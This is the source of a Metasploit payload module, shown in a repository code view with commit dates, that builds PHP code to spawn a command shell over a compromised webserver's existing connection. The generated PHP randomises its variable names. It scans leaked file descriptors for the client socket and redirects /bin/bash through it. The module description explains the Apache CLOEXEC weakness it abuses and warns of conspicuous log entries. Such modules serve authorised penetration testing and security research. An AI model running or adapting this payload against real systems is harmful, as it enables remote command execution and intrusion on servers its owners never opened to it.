metasploit-framework/modules/payloads/singles/php/shell_findsock.rb

91 lines
2.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
require 'msf/core/handler/find_shell'
module Metasploit3
CachedSize = dynamic
2013-08-30 21:28:54 +00:00
include Msf::Payload::Single
include Msf::Payload::Php
include Msf::Sessions::CommandShellOptions
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Sock',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
},
2014-07-11 17:45:23 +00:00
'Author' => [ 'egypt' ],
2013-08-30 21:28:54 +00:00
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
2013-08-30 21:28:54 +00:00
def php_findsock
2013-08-30 21:28:54 +00:00
var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
shell = <<END_OF_PHP_CODE
error_reporting(0);
print("<html><body>");
flush();
function mysystem(#{var_cmd}){
2013-08-30 21:28:54 +00:00
#{php_preamble()}
#{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}
return #{var_out};
}
#{var_fd} = 13;
for ($i = 3; $i < 50; $i++) {
2013-08-30 21:28:54 +00:00
$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
#{var_fd} = $i - 1;
break;
}
}
print("</body></html>\n\n");
flush();
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
mysystem(#{var_cmd});
END_OF_PHP_CODE
2013-08-30 21:28:54 +00:00
return shell
end
2013-08-30 21:28:54 +00:00
#
# Constructs the payload
#
def generate
return php_findsock
end
end